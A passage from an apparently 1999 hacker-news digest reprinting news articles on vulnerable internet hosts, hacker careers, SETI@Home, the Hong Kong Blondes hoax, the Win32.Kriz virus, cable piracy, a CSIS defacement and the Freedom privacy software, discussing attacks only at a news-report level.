Then, it changed drastically. Below are some single day network map snapshots for the period from May 1st until May 10. As you can see from the maps, a fair amount of the Yugoslavian network disappears and subsequently reappears on a daily basis. We also mapped Bosnia during this period. Though our traces showed no common communication routes, quite a bit of Bosnia went away at the same time. We suspect that the two countries probably share power grid connections. http://www.cs.bell-labs.com/~ches/map/yu/index.html (maps) @HWA 37.0 Survey Finds Internet Full of Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Using custom made software Liraz Siri, an 18 year old from Israel, probed 36 million internet hosts for 18 common vulnerabilities. 450,000 of those servers were vulnerable to attacks. While that is only 2% of the total that is way to much.(Yes, we have mentioned this before, but it is important.) Internet News http://www.internetnews.com/intl-news/article/0,1087,6_184381,00.html Interent Auditing Project Report - Via Security Focus http://www.securityfocus.com/templates/forum-latest.html?forum=2 @HWA 38.0 Hacking Into an IT Career ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by WeldPond Looking for a career in 'hacking'? David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco gave out a few tips to the attendees at the recent Chaos Computer Camp. ComputerWorld http://www.computerworld.com/home/news.nsf/all/9908124hackcareers (Online News, 08/12/99 05:34 PM) Hacking your way to an IT career By Ann Harrison ALTLANDSBERG, GERMANY -- At the first annual Chaos Communication Camp, which took place outside of Berlin last weekend (see story), hundreds of hackers and their machines filled the main hack tent exchanging information on the latest exploits and security tools. 
Most were young, skillful and in demand by corporate information technology departments. The camp, which attracted some of the most talented European and American hackers, was one of the largest hacker gatherings in Europe so far this year.

David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco, agreed. He noted that hackers like himself were working at all the top five auditing and accounting firms. Del Torto presented hacker career workshops with titles such as "Take This Job and Ping It/Hacking The Corporate Ladder For Fun & Profit."

The following are some of the tips he offered hackers seeking corporate jobs:

- Write your own job description.
- Volunteer for a project in your area of expertise.
- Network with people.
- Start your own company. Or sign on to another start-up.

He also advised the crowd to build tools they themselves would use ("You should be customer No. 1!"), license technology when appropriate and solve problems with free software or generate it.

"When building reputation capital, it's pretty important to learn to think like the boss," he said.

In addition to his day job, Del Torto is a member of the Cypherpunks, a San Francisco-based hacking organization that produces what he calls "no-compromise" security technology.

Del Torto had advice for his Fortune 1000 brethren, too. Asked if young hackers, who may not be partial to suits and ties, are discriminated against, Del Torto recalled that Dan Farmer, author of the widely used Satan network scanning tool, was once turned down by a prospective employer who found his appearance unsettling.

He urged IT managers to avoid superficial judgments and focus on the reputation of the individual. IT managers interviewing young people who "act differently" should remember when they were young, he advised.

Del Torto noted that in the relatively small community of IT security professionals, people are preceded by their reputations.
He said he knows programmers who are talented, but he won't hire or recommend them because they don't act responsibly.

@HWA

39.0 SETI@Home, Largest Computation Ever
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

With over 1 million users and 50,000 years of accumulated computer time, the SETI@Home project is now the largest computation ever. SETI@Home is a distributed computing project that analyzes radio signals for signs of alien life. The HNN SETI@Home Team is still going strong.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_423000/423022.stm

HNN SETI@Home Team
http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html

Tuesday, August 17, 1999 Published at 18:11 GMT 19:11 UK

Sci/Tech

Alien hunter breaks record

The massive Arecibo telescope is collecting the data

By BBC News Online Science Editor Dr David Whitehouse

The SETI@home screensaver project, which allows anyone with a desktop computer to join the search for intelligent life in space, is now the largest computation ever done, on Earth at least.

Since May, over a million people have downloaded the SETI@home screensaver. But, despite an accumulated 50,000 years of computer time, no signs of alien life have yet been found.

The SETI@home program has infiltrated homes, offices and classrooms in 223 countries. "It is truly a phenomenon," said SETI@home project director David Anderson. "One person runs it in an office and pretty soon the whole office is doing it."

Companies large and small (including the BBC) as well as schools and universities have formed groups to compete to see whose computers can analyse the most chunks of data.

The program acts like a screen saver, starting when the computer is idle and analysing data collected from the Arecibo radio telescope in Puerto Rico. The analysis is done automatically and the results are sent back to the University of California at Berkeley, while participants can see the progress on the computer screen.
Number cruncher

According to Professor Anderson it proves the value of distributed computing, and it has encouraged him to look around for other projects that could benefit from this technique.

"SETI@home is now the largest computation ever done on this planet, we have accumulated more than 50,000 years of computing time so far," said project scientist Dan Werthimer, a research physicist at the University of California Berkeley's Space Sciences Laboratory.

"This also is the most sensitive sky survey ever conducted," Professor Werthimer added. "SETI@home is so powerful because we are using the world's largest telescope and we are able to use it continuously, 24 hours a day, by piggybacking on other observations."

Of the million people who have downloaded the software about 600,000 have completed at least one unit of data analysis.

Analysts say that the backlog of data from the Arecibo telescope is rapidly disappearing, and Professor Anderson and his team are currently updating the software to analyse the data again to search for more complex signals.

@HWA

40.0 Hong Kong Blondes Labeled a Fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Simple.Nomad

An article in Computer Currents has labeled the Hong Kong Blondes as a hoax. The HKBs are a deep underground group who work to disrupt Chinese computer systems from the inside. This article claims that because he can't find any evidence to support their existence they must be fake. Maybe they are just really good at hiding. That is, after all, what it means to be underground. Last year the Cult of the Dead Cow formed a relationship with the group to help train them on encryption and intrusion techniques. Last December the cDc issued a press release claiming that their training had been successful and that their relationship would now end. Just because the reporter who wrote this article can find no evidence of their existence probably means he didn't look too hard.
Computer Currents
http://www.currents.net/newstoday/99/08/18/news3.html

Late Update

In a recent conversation with HNN, Reid Fleming, a cDc cultee, said "An absence of evidence does not equal evidence of absence."

The Hacker Hoax

By Neil Taylor, IT Daily. August 18, 1999

The world's press might have been fooled into believing that a Chinese hacker group plans to bring down the country's information infrastructure.

According to stories that began circulating in July last year, the rogue group, the Hong Kong Blondes, is made up of dissidents both overseas and within the Chinese Government.

The rumours began when an interview with the group's leader was published by US hacking group the Cult of the Dead Cow (CDC) at http://www.cultdeadcow.com. In the interview, elusive Hong Kong Blondes director Blondie Wong said that he had formed an organization named the Yellow Pages, which would use information warfare to attack China's information infrastructure. The group threatened to attack both Chinese state organizations and Western companies investing in the country. For their part, the CDC claimed that they would train the Hong Kong Blondes in encryption and intrusion techniques.

One year after the group's supposed launch, there is no evidence that the Hong Kong Blondes ever existed. In fact, all evidence appears to indicate that the Hong Kong Blondes report was a highly successful hoax.

The story was first reported in Wired magazine, and during the past year has been followed up by numerous publications including USNews, the Los Angeles Times, Asiaweek and ComputerWorld. In every case, the original source was the CDC's July interview.

The CDC is best known for its remote administration tool Back Orifice. BO can be installed on a Windows PC without the user's knowledge, giving full control over the machine to unauthorized third parties. The first version of Back Orifice was released a month after the Blondes story was leaked to Wired magazine.
Repeated attempts to contact the CDC failed to elicit a response, and despite inquiries throughout the Hong Kong technology and security industries, not one person contacted had ever come across any evidence of the group's existence.

The Hong Kong Police, which is responsible for tracking hacking activities locally, had no knowledge of the group. Detective senior inspector Martyn Purbrick, of the Commercial Crime Bureau's Computer Crime Section, said that there had been no official reports of the group's activities. He added that he only knew the group's name through reports in the media.

Stephen Mak, principal assistant secretary of the information technology and broadcasting bureau, said, "We have carried out inquiries both within the government as well as with the ISPA, but we could find no information about the group."

Samuel Chanson, director of the Cyberspace Centre at the Hong Kong University of Science and Technology, said the threats would take no great skill to carry out. "Hacking into almost any major server is do-able with some training."

Chanson said that a group of his undergraduate students took a two-day course in intrusion techniques, after which they were able to break into several hundred servers in campus tests. "We checked how good their network security was and succeeded in bringing down a good number of their servers as well as gaining important information... Attacking the general commercial server is not a difficult task."

Early this year, a US hacker group, the Legion of the Underground (LoU) at http://www.legions.org, launched a declaration of infowar on China, in response to the harsh penalties handed out for computer offenses in the country. LoU members cited the Hong Kong Blondes as an influence behind their short-lived war, which was abandoned following condemnation from other hacker groups.
However, a large number of Chinese Web sites were hacked by protesters, including Hongkong.com, China Window, Wenjin Software and the semi-official China Society for Human Rights Studies.

CDC remains tight-lipped on the issue. But publishers might do well to remember a statement made by the group in its Media Domination Global Update: "We intend to dominate and subvert the media wherever possible."

@HWA

41.0 Peace Prize Winner Warns of Cyber War
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lionel

Jose Ramos Horta, a Nobel laureate, has warned that if fraud is detected in the August 30th balloting in the vote for East Timor's independence then cyber war will result. The Timor resistance leader has warned that a dozen viruses were being designed by over 100 people in Europe and North America to infect computers if fraud is detected. (While these claims may be true it reeks of sensationalism and headline grabbing. With no evidence to support these claims we remain doubtful.)

BBC
http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_423000/423549.stm

Wednesday, August 18, 1999 Published at 13:45 GMT 14:45 UK

World: Asia-Pacific

Timor activists warn of cyber war

Gunmen shot at the offices of the main independence group on Tuesday

Computer hackers plan to sabotage Indonesia's banking system if Jakarta rejects an East Timor vote for independence, resistance leader Jose Ramos Horta has warned.

Mr Horta said about a dozen viruses were being designed to infect computers if there is fraud in the 30 August ballot on the territory's future.

The Nobel laureate warned that a 100-strong team of hackers in Europe and North America had prepared a campaign that would cause economic devastation to Indonesia.

Their targets would include computers controlling banking, finance, the military and aviation, he said in a commentary in Australia's Sydney Morning Herald.
"One computer wizard recently told me, 'We will terminate their banking system. We will invade their sites and destroy them... We will cause them to lose hundreds of millions of dollars'," he added.

Electoral fraud

The warnings come as East Timor prepares to choose between Jakarta's offer of autonomy or full independence. The United Nations, which is overseeing the ballot, says it is confident there will be a free and fair vote.

But Mr Horta has warned that the ballot could turn into the biggest electoral fraud in modern times. He said Indonesia's army intended to get a pro-integration vote through by terror and fraud.

Mr Horta alleged that a violent campaign by pro-Jakarta militias had already:

- cost over 1,000 lives
- razed entire villages
- uprooted 80,000 people

He said the vote was also compromised by:

- a ban on detained resistance leader Xanana Gusmao and himself during the campaigning
- continued Indonesian army support for the militias
- a biased Indonesian-controlled East Timorese media

"All this makes for an extremely dangerous situation. Full-scale violence before or after the ballot is now almost certain," Mr Horta added.

"The next phase of resistance will be much more desperate and ferocious and will not be contained to East Timor," he added.

Mr Horta's comments came as Amnesty International also warned that Indonesia's failure to halt the bloodshed in East Timor - mainly by pro-Jakarta militias - threatened to prevent a fair ballot.

Indonesia invaded East Timor, a former Portuguese colony, in 1975 and annexed it the following year in a move not recognised by the UN. Human rights groups say more than 200,000 people died, many of them from starvation, in the years since the invasion.

@HWA

42.0 Mitnick Still Denied Kosher Food
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by TurTleX

In continuing violation of Constitutional Law, Kevin Mitnick is still being denied the ability to practice his religion by not being served kosher foods.
A rabbi for the San Bernardino County Detention Center has confirmed that the center does not provide kosher meals. Kevin has started eating the vegetarian meals provided by the prison as an alternative, even though they are not kosher.

Wired
http://www.wired.com/news/news/politics/story/21322.html

Life Not Kosher for Mitnick

by Douglas Thomas

12:15 p.m. 18.Aug.99.PDT

Jailed computer hacker Kevin Mitnick wants out of his current facility because it doesn't serve kosher food.

Mitnick wouldn't eat for the first two days of his stay at the San Bernardino County Detention Center after being transferred there from the Los Angeles Metropolitan Detention Center. He only recently began eating the jail's vegetarian meals, which it offers as a substitute. But those meals don't meet rabbinical standards.

Mitnick insists that maintaining a kosher diet is extremely important to him.

"This is a violation of my constitutional rights," Mitnick said. "I'm being forced into a situation where I have to violate my religious beliefs or starve."

Complicating the move, Mitnick said, is that his MDC-stored money won't be available for several weeks, making it impossible for him to buy commissary food. In addition, he said, prices are triple what they were at the old facility.

Mitnick's rabbi, Aaron Kriegal, and the rabbi for the San Bernardino County Detention Center, Hillel Cohn, confirmed that the SBCDC does not serve kosher meals to Jewish inmates.

"Does it make life more difficult? Yes," Cohn said. "But being in prison is difficult. It wasn't meant to be a country club. There are some sacrifices inmates have to make."

Cohn said returning Mitnick to Los Angeles would "make life easier" for Mitnick, but did not believe that the move was likely.

"This is not the first request we've had to have an inmate transferred for this reason," Cohn said.
At sentencing, Mitnick's attorney failed to persuade US District Judge Marianne Pfaelzer that Mitnick serve his time at the MDC to ensure his access to kosher meals.

Currently, Mitnick shares one large cell with approximately 60 other inmates, each of whom is issued a small mattress, sheet, and blanket. The cell contains one toilet and one shower, each in open view of the cell. Mitnick calls the conditions "dehumanizing."

Mitnick is expected to spend four to six weeks at the San Bernardino facility while awaiting final designation, most likely to Nellis Prison Camp just outside of Las Vegas.

Mitnick's attorneys have filed a motion with the court requesting that he be transferred back to the MDC until the Bureau of Prisons decides where he will serve the remainder of his 46-month prison sentence. Because of previous time served, Mitnick is expected to be released in January 2000.

@HWA

43.0 Cable Pirates Busted
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by skeletor and deepquest

MediaOne, the largest cable provider in Massachusetts, recently performed an audit of 162,000 non-customer homes and found that over 23,000 were receiving cable illegally. MediaOne has decided not to press charges but instead has disconnected the freeloaders. MediaOne has hired contractors to go street by street to check whether non-customers are receiving cable TV service. These audits are performed from outside the homes.

Boston Globe
http://www.boston.com/dailyglobe2/230/metro/many_get_cable_TV_for_free_audit_finds+.shtml

A raid conducted on Wednesday by MediaOne officials and the Moreno Valley Police Department has uncovered more than a million dollars' worth of "black boxes," the descrambling device that enables users to illegally access cable-TV channels. All equipment, including shipping and billing information from Cable Converter Concepts and Hi-Tech Converter Labs, was confiscated.
Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?28463/topstories

Boston Globe

Many get cable TV for free, audit finds

MediaOne pulls plug on thousands

By Bruce Mohl, Globe Staff, 08/18/99

In a street-by-street survey in Eastern Massachusetts, the state's largest cable television company is finding that thousands of people are getting cable but not paying for it.

Of 162,000 non-customer homes or apartments checked so far by MediaOne, 14 percent, or nearly 23,000, were receiving an unauthorized cable TV signal. In most cases, the signal was either stolen or left on inadvertently by MediaOne.

MediaOne is not taking the freeloaders to court or demanding back payment. Instead, the company is disconnecting the unauthorized service and politely urging the consumer to start paying for it. So far, about 16 percent have done so.

"It's an amnesty kind of deal," said John Fouhy, director of security for MediaOne in the Northeast. "We don't consider it stealing or illegal. It's just not in our billing system."

Fouhy declined to identify where the problem is most severe, saying he did not want to cast aspersions on any particular community. But he said it is more pronounced in urban areas with apartment buildings where people tend to move in and out a lot. MediaOne serves most of Eastern Massachusetts except for Boston, Brookline, and Braintree.

"Leafy suburbs tend to have lower unauthorized rates," Fouhy said.

At a time when MediaOne is rapidly building a sophisticated network to carry high-speed Internet access and local phone service in addition to cable TV, the fact that thousands of people are getting cable for free cannot do the company's high-tech image any good. But Fouhy said he was not surprised by the numbers, given what companies in other parts of the country have found with similar audits.
He said that some people are stealing the signal and in other cases are just taking advantage of MediaOne's failure to shut previous service off.

He gave the example of someone in Cambridge who is paying for cable TV and moves out of the apartment. Rather than send a technician to the apartment to shut service off, Fouhy said, MediaOne and the companies it has acquired in recent years often leave service on for the tenant moving in. That way service can start immediately with little or no installation cost for both the consumer and the company.

"In most instances, people understand cable doesn't come with the house," Fouhy said. But apparently all too often the new tenant would just plug his cable wire into his TV set or videocassette recorder and start watching CNN.

Fouhy said the survey began in March and is scheduled to end in October and then resume again next year. It has focused mostly on communities where "churn" - turn-ons and turn-offs of cable service - is high or where cable penetration seems unusually low.

In those communities, Fouhy said, MediaOne has hired contractors to go street by street to check whether noncustomers are receiving cable TV service. Fouhy said the surveyors do not go inside homes.

The MediaOne survey is not designed to track down people who are using black boxes to illegally pirate premium cable channels, a problem that Fouhy described as "significant." Industrywide, he said, cable companies are losing more than $5 billion a year in pirated premium and pay-per-view channels. MediaOne officials declined to comment on what tactics they are using to eliminate this fraud.

In such an extensive audit, accidents apparently happen. Susanna Joannidis of Cambridge, who owns a single-family home and is up-to-date on her monthly MediaOne bill, said she and a neighbor lost their cable service early last month.
It took almost two days to figure out that a technician had shut off the wrong service, causing Joannidis to miss the finals of Wimbledon that she had been eagerly anticipating.

Joannidis said she thought it was strange that MediaOne does not know who its customers are. MediaOne sent Joannidis a letter of apology and gave her a $110 credit.

This story ran on page A01 of the Boston Globe on 08/18/99.
© Copyright 1999 Globe Newspaper Company.

-=-

MediaOne Sting Operation Nabs Web-Based Cable Pirates; Moreno Valley Police Department Raid Nets More Than $1 Million in Illegal Equipment

EL SEGUNDO, Calif., Aug 18, 1999 (BUSINESS WIRE via COMTEX) -- On Wednesday, MediaOne(R) and the Moreno Valley Police Department executed three early-morning search warrants, raiding private homes in Riverside County, Calif., and uncovering evidence of a multimillion-dollar national cable-piracy operation that had been conducted over the Internet.

The raid netted more than a million dollars' worth of "black boxes," the descrambling device that enables users to illegally access cable-TV channels, as well as master computer chips that could be cloned for new black boxes, and shipping and billing evidence.

Charles Balan, 28 years old, of Romoland, Calif., and Brian Fulk, 24 years old, of Moreno Valley, were arrested and are facing felony charges. A third suspect is still at large. The extensive computer equipment from their operations, called Cable Converter Concepts and Hi-Tech Converter Labs, was confiscated, and their Web sites were shut down.

Theft of service is one of the biggest problems faced by cable companies today. It is estimated that this criminal activity costs the industry and its customers more than $5.8 billion annually. Not only is this cost passed on to honest customers, but the quality of their service is also diluted by the illegal hardware. Cities themselves also lose millions in franchise fees -- the monthly, subscriber-based revenues paid to them by cable-TV companies.
"The success of today's operation is a perfect example of what occurs when you have a cooperative effort between private industry and law enforcement," said Sgt. Joseph Cleary, supervisor in charge of the search-warrant execution.

"We're getting the message out that we won't tolerate this kind of criminal activity," said Mike Bates, director of security for MediaOne. "Abuse of e-commerce via the Internet is a nationwide problem that affects cities, companies and private citizens alike."

MediaOne Group (NYSE:UMG) is one of the world's largest broadband-communications companies, bringing the power of broadband and the Internet to customers in the United States, Europe and Asia. The company also has interests in some of the fastest-growing wireless-communications businesses outside the United States. For 1998, the businesses that constitute MediaOne Group produced $7.1 billion in proportionate revenue. On May 6, 1999, the company entered into an agreement to merge with AT&T.

Copyright (C) 1999 Business Wire. All rights reserved.

@HWA

44.0 CSIS Admits Web Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest

The Canadian Security Intelligence Service has admitted that its web page had been defaced back in 1996. The spy agency admitted that its web page had been changed to read "Canadian Security Illegal Service". CSIS admitted what had occurred in a recent paper released by the agency that discusses cyber warfare.
Globe Technology
http://www.globetechnology.com/archive/gam/News/19990818/UTERRN.html

Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?28513/topstories

Hackers altered its Web page, CSIS reports

Terrorists could cripple societies, start wars by invading cyberspace, spy agency warns

JEFF SALLOT
Parliamentary Bureau
Wednesday, August 18, 1999

Ottawa -- Computer hackers altered the logo on the Canadian Security Intelligence Service's Web page to read "Canadian Security Illegal Service" within days of the site going up on the Internet, the spy agency says.

This act of cyberspace vandalism was quickly cleaned up, and there is no evidence the hackers ever got into the agency's top-secret internal computer network, CSIS says.

But the incident is a warning about how hackers can manipulate data from long distances, CSIS says in a new background paper describing trends in international terrorism and warning that cyberattacks might cripple modern societies.

The background paper was released yesterday and is the service's first public disclosure of the 1996 incident involving its own Web page.

CSIS spokesman Dan Lambert said the Web sites of several other federal government departments were also hit at about the same time. An investigation was conducted, but CSIS will not disclose the results.

The background paper warns that as modern countries become increasingly dependent on computer-based communication, "future wars could involve cyberattacks on information infrastructure." Canada is particularly vulnerable because of its heavy reliance on these advanced technologies.

"If teenagers can compromise networks using basic skills and tools available on the Internet, the concern is what can be accomplished by terrorist groups or states with far greater resources and motivation," the paper says.

The paper says that the Web site of the Irish Republican Army openly discusses ways it could use so-called information operations to attack British interests.
A support group for Tamil terrorists took responsibility for attacking the E-mail system of Sri Lankan diplomatic missions in Washington and New York two years ago.

"On the World Wide Web, distance is not a factor. . . . We are as vulnerable as any other country and have more assets at risk than most," the paper says.

CSIS, like other sensitive government agencies, almost certainly protects its secret computer systems by physically segregating them from any connection to the Internet, commented Peter Davis, a computer-security consultant.

Mr. Davis said that terrorist attacks in cyberspace are going to become more frequent as groups become more sophisticated in the use of technology.

Even some of the most sophisticated military communications systems appear to be vulnerable. Military sources have said the Canadian Forces lost key computer links with 10 military allies for 24 hours during a simulated cyberterrorist attack last year. A Canadian team working in Britain penetrated military networks as far away as Australia.

-=-

Canadian Security Agency Warns Against Cyber-Attack

OTTAWA, ONTARIO, CANADA, 1999 AUG 18 (Newsbytes) -- By Martin Stone, Newsbytes.

Canada's central security agency, the Canadian Security Intelligence Service (CSIS), has issued a warning against global terrorism, citing hackers and crackers, those who penetrate secure computer systems, as a growing threat.

In a background paper released Thursday, CSIS admits that crackers entered their Website in 1996 and altered their logo by changing the word "Intelligence" to "Illegal." In this first public disclosure of the incident, the agency says the damage was quickly discovered and corrected, but the event serves as an example of how cyber-savvy terrorists may be able to tamper with mission-critical systems.
The paper gives a brief outline of terrorist activities of the past and suggests that insurgents could severely cripple societies and even start wars by invading and taking control of the critical computer components.

The CSIS site was cracked within days of its having gone live, but the agency says there is no evidence that any sensitive files were entered. CSIS spokesman Dan Lambert told Newsbytes that the site is in the public domain and is in no way connected to other CSIS computer systems, adding that the server is not even located on the CSIS premises, but housed at Canada's Department of Public Works.

He said the Websites of several other federal government departments were also invaded at about the same time. Since then, there have been several instances of federal and provincial government Websites being cracked; however, no serious outages or security breaches have occurred.

The study hints that, as modern civilizations become more dependent on computers and connectivity, future wars could be fought in cyberspace. Canada is known to be particularly vulnerable due to a heavy reliance on advanced technologies, as has been reported recently by Newsbytes and other media.

The backgrounder says: "If teenagers can compromise networks using basic skills and tools available on the Internet, the concern is what can be accomplished by terrorist groups or states with far greater resources and motivation."

The paper also states: "Terrorist methods continue to become more sophisticated, both in terms of technology and the exploitation of public opinion and media channels. Globally mobile and knowledgeable about communications, explosives technology and computers, they have contacts around the world. Their activities and targets are difficult to predict. The use of technology, always part of the terrorist arsenal, has been augmented by encryption and the Internet to facilitate communication and reach a wider audience.
"In addition, the growing dependence of states on computer-based communication and technologies is leading to a world in which future conflicts could involve activities in cyberspace and attacks on a state's information infrastructure, now commonly referred to as information operations. As one of the world's most advanced states in its reliance on information technologies, Canada is concerned about its vulnerability to this threat.

"We are already seeing indicators of the changing threat environment in this area. One of the IRA Websites openly discusses ways it could use information operations to attack British interests. In the summer of 1997, a group linked to the Liberation Tigers of Tamil Eelam claimed responsibility for an attack on the e-mail systems of the Sri Lankan Embassy in Washington and its Mission in New York.

"If a Website is successfully hacked into, data on the site can be manipulated. As an example, the CSIS Website was hacked into and a few words changed on the home page. On the World Wide Web, distance is not a factor. Canada's geographic location and the world's longest undefended physical border provide no natural protection against these kinds of attacks. We are as vulnerable as any other country and have more assets at risk than most."

Analysts suspect that cyber-terrorist attacks will become more frequent as groups grow more sophisticated in the use of technology.

The full text of the backgrounder can be found at http://www.csis-scrs.gc.ca

@HWA

45.0 Win32.Kriz Set To Go Off Christmas Day
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague

A new virus set to hit on Christmas day could be more devastating than the CIH virus. The virus, which has been described as being "very well written", kills the CMOS memory, overwrites data on all available drives, and destroys the flash BIOS using the same method the Chernobyl virus used.
Luckily, computer users will have until December 25 to buy or update their anti-virus software. The virus only infects users of Microsoft Windows.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2316716,00.html?chkpt=hpqs014

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

'Christmas' virus can destroy PCs
By Bob Sullivan, MSNBC
August 18, 1999 3:00 PM PT
URL:

A nasty new virus discovered by researchers promises to do even more damage to victims than the Chernobyl virus. It has the ability not only to erase files, but also to render a PC useless by destroying its flash BIOS. The good news is it won't execute until Dec. 25; the bad news is PC users without anti-virus programs may have a very bad Christmas Day.

The author of Win32.Kriz, discovered recently by researchers, sounds as if he or she has an ax to grind against religious folks. Inside the virus is a text string with a poem full of expletives criticizing those who preach religion: "I don't wanna hear it, coz I know none of it's true," the author writes, according to anti-virus research firm Kaspersky Lab.

Victims of the virus -- who can be anyone using Windows 95, Windows 98 or Windows NT -- can expect a load of trouble. The virus kills the CMOS memory, overwrites data in all files on all available drives, and then destroys the flash BIOS by using the same routine that was found in the "Win95_CIH" virus, also known as Chernobyl.

"This is a nasty one, very well written," said Dan Takata of anti-virus vendor Data Fellows Inc. He said it's too early to tell if the virus will be widespread -- but potential victims have until Dec. 25 to update their antivirus programs against it.
@HWA

46.0 MS Windows Media Audio Broke One Day After Release
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by darktide

Microsoft recently released Windows Media Audio, an audio format set to compete against MP3. The difference is that WMA has security features built in to force people to pay for the music they listen to. One day after the release of this format, cracking programs like unfuck.exe and AudioJacker were available to defeat this technology. Microsoft is working on a fix.

C|Net
http://www.news.com/News/Item/0,4,40672,00.html?st.ne.fd.gif.f

Windows Media hits sour note
By Jim Hu and Michael Kanellos
Staff Writers, CNET News.com
August 18, 1999, 4:45 p.m. PT

A day after Microsoft released its new Web music technology, the company confirmed that crackers have already developed a program to strip away the security behind it.

Microsoft acknowledged that the executable file, dubbed "unfuck.exe," exists and works. In fact, there are a number of programs, such as Audiojacker, that perform similar functions. "This one just has a glitzier name," said a Microsoft spokesman, adding that the company is working on a fix.

Normally, only the user who downloads and pays for a song encrypted in Microsoft's Windows Media Audio 4 technology can listen to it. But with the new exploit, someone who pays for the song also can email it to friends who want to hear or copy it.

The program works by rerecording musical tracks in an unprotected format. To take advantage of the program, a would-be pirate has to buy and download music. During the downloading process, the executable intercepts the music and reformats it into a different format that doesn't have embedded security elements. Copies can then be made freely.

Windows Media Audio is Microsoft's answer to the numerous audio compression formats that have gained popularity in the last year. These technologies allow users to download music off the Web and play it back.
MP3 is one technology that has gained considerable popularity.

Although piracy is theft and represents lost potential revenue, observers say the record industry has historically overplayed the threat. Pirated copies of software or music, especially among hobbyists, will always crop up. Recently the Recording Industry Association of America, which represents the major U.S. record companies, has acknowledged this publicly.

"We'll always have piracy of cassettes and CDs, for instance, with the flea markets or street vendors. That will never go away, and I think the same will be true of the Internet," Hilary Rosen, chief executive of the RIAA, said in an earlier interview. "But we're going to see an explosion of legitimate music online. And consumers are going to have an alternative. I believe consumers will want the alternative."

Some analysts agree that consumers tend to gravitate toward buying legitimate copies. "The piracy threat is a bit overblown at the present time," said Mark Hardie, senior analyst at Forrester Research. "There will be levels of piracy that will be unavoidable...You will always have code somewhere in cyberspace that will hack through encryption."

He added that it is easier to trace the source of pirated copies of digital music than copies made from traditional methods of recording. That means it likely will be easier to stop illegal copying in the future than it is today, he said.

Windows Media is a group of technologies for multimedia playback. Besides Windows Media Audio, the package includes Windows Media Player and software and services including Windows Media Services, Windows Media Tools, and a software development package.

The Windows Media Audio exploit was first reported on the pro-MP3 Dimension Music site.

@HWA

47.0 Available Soon, Freedom!
~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by jordan

Zero-Knowledge Systems, the Montreal-based start-up, is set to release Freedom, which is a comprehensive Internet privacy package that offers multiple online pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge couldn't crack if it wanted to. Freedom 1.0 for Windows is set for release in late October or early November.

CNN
http://www.cnn.com/TECH/computing/9908/18/freedom/index.html

Zero Knowledge Systems
http://www.zks.net/clickthrough/click.asp?partner_id=542

Total digital privacy may be on the horizon
August 18, 1999
Web posted at: 5:32 p.m. EDT (2132 GMT)
By Robin Lloyd
CNN Interactive Senior Writer

(CNN) -- If American software developers were to touch any of the code in the 10,000 released beta versions of an Internet privacy solution that is getting good preliminary marks, they would be subject to prosecution.

In fact, if Zero-Knowledge Systems were based in the United States, it would be illegal for the company to export its Internet privacy software, dubbed 'Freedom.'

Instead, the Montreal-based start-up, headed up by 26-year-old Austin Hill, is set to release the first product of its kind -- a comprehensive Internet privacy package that offers multiple online pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge couldn't crack if it wanted to.

No more cookies, e-mail trails and digital identity stealing. At least, that's the idea.

More than a dozen "cookie killers" already exist, along with several e-mail and browser anonymity services such as anonymizer.com. Those all rely on what Hill calls a "trust-me" mechanism. A third party server holds users' identity and data. Freedom makes it so the end-user has sole possession of that data.

"If there was a gun to my head, I still could not reveal or break the privacy of my users," Hill says.
The user has the only "key" to their pseudonyms, which can be linked to independent e-mail addresses, geographic locations and encryption keys.

Freedom is designed to protect the e-mail, chats, browsing and newsgroup searches of anyone from a Chinese dissident posting pro-democracy messages to an employee checking out listings for Alcoholics Anonymous.

The software can encrypt private chats and newsgroup discussions, ensures anonymous Web browsing and can even block spam, Hill says. Each digital identity relies on full strength encryption that ranges from 128 to 4,096 bits.

Freedom 1.0, which works only on Windows platforms, is set for release in late October or early November. It will be downloadable for $49.95. Macintosh and Linux versions are due out next year. Freedom doesn't work with America Online, however, since AOL is an online service separate from the Internet.

Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7 convention in Las Vegas last month. Since then, it has released thousands more via its Web site. A total of 50,000 people have requested copies since then.

How it works

Web users leave traces of their identity behind every time they visit a Web site or send e-mail. To get a sense of the process, visit the Center for Democracy and Technology's site and use its demo.

Freedom allows users to set up separate pseudonyms for different aspects of their lives -- an identity for an online chat about health care, another for interactions with friends and family, others for Internet browsing and finally a 'true' identity for e-commerce. Zero-Knowledge is working on an e-commerce identity protection solution for future versions.

Freedom scrambles data coming from a user's PC and hides the source and destination of Internet traffic routed through the service. The message or data packet is first sent to Zero-Knowledge's servers where it is wrapped in a layer of encryption.
That initiates a delivery process where the data bounces from one independently owned relay station to the next and can only be opened by one specific user who then forwards it to another specific user, with that process repeating several times. Eventually a data packet goes to its intended target but neither snoopers, nor the final recipient, have any way of tracing its origins.

